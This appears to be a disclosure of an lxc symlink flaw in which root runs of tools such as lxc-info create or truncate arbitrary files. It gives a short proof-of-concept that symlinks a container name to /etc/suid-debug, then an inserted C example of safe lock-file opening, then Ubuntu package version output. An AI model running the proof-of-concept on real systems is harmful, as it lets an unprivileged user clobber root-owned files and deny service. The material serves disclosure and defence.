When lxc tools, e.g. lxc-info, are run as user root, a symlink attack on /run/lock/lxc can be used to create or truncate arbitrary files as user root. For this to work, the malicious user has to be faster than the first lxc invocation, so that /run/lock/lxc does not yet exist.
POC:
# su -s /bin/bash nobody
# mkdir -p lxc/var/lib/lxc
# ln -s /etc/suid-debug lxc/var/lib/lxc/somename
As root:
lxc-info --name somename
The guest "somename" has to exist; the method also works for unprivileged containers in /var/lib/lxc. Using the same command to truncate arbitrary files will cause a local DoS.
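The defensive counterpart to the report above, as an added example that is not lxc's own code: a lock-file open routine that refuses a symlink planted anywhere an unprivileged user could reach instead of following it as root. Function names, the temporary directory and the "victim" file are hypothetical, and the self-check constructs its own input.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open "dir/name" as a lock file without following symlinks: returns an fd,
 * or -1 with errno ELOOP (symlink in the way) or EPERM (untrusted dir). */
int open_lock_file_safely(const char *dir, const char *name)
{
    struct stat st;
    /* O_NOFOLLOW: a symlink planted as the lock directory fails with ELOOP
     * (a full implementation walks every intermediate component this way). */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    /* A directory another user owns or can write to can be re-pointed
     * between this check and the openat below, so refuse it. */
    if (fstat(dfd, &st) < 0 || st.st_uid != geteuid() ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(dfd);
        errno = EPERM;
        return -1;
    }
    /* Relative to the verified directory; O_NOFOLLOW on the final component
     * refuses a symlink named "name" instead of truncating its target. */
    int fd = openat(dfd, name, O_RDWR | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    close(dfd);
    return fd;
}

/* Self-check on constructed input: a temp lock dir holding a symlink
 * "somename" -> "victim" (6 bytes); returns 1 if the open is refused with
 * ELOOP and the victim file still holds its 6 bytes. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/lxclockXXXXXX", victim[64], link[64];
    struct stat st;
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/somename", dir);
    int v = open(victim, O_WRONLY | O_CREAT, 0600);
    if (v < 0) return 0;
    int ok = write(v, "secret", 6) == 6;
    close(v);
    if (!ok || symlink(victim, link) != 0) return 0;
    int fd = open_lock_file_safely(dir, "somename");
    return fd == -1 && errno == ELOOP && stat(victim, &st) == 0 && st.st_size == 6;
}
```

The ownership check also rejects the case from the report where the attacker pre-creates the lock directory tree as a real directory rather than a symlink.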
# lsb_release -rd
Description: Ubuntu 14.04.2 LTS
Release: 14.04
# apt-cache policy lxc
lxc:
  Installed: 1.0.7-0ubuntu0.1
  Candidate: 1.0.7-0ubuntu0.1
  Version table:
 *** 1.0.7-0ubuntu0.1 0
        500 http://archivexxx/ubuntu/ trusty-updates/main amd64 Packages
        100 /var/lib/dpkg/status
     1.0.3-0ubuntu3 0
        500 http://archivexxx/ubuntu/ trusty/main amd64 Packages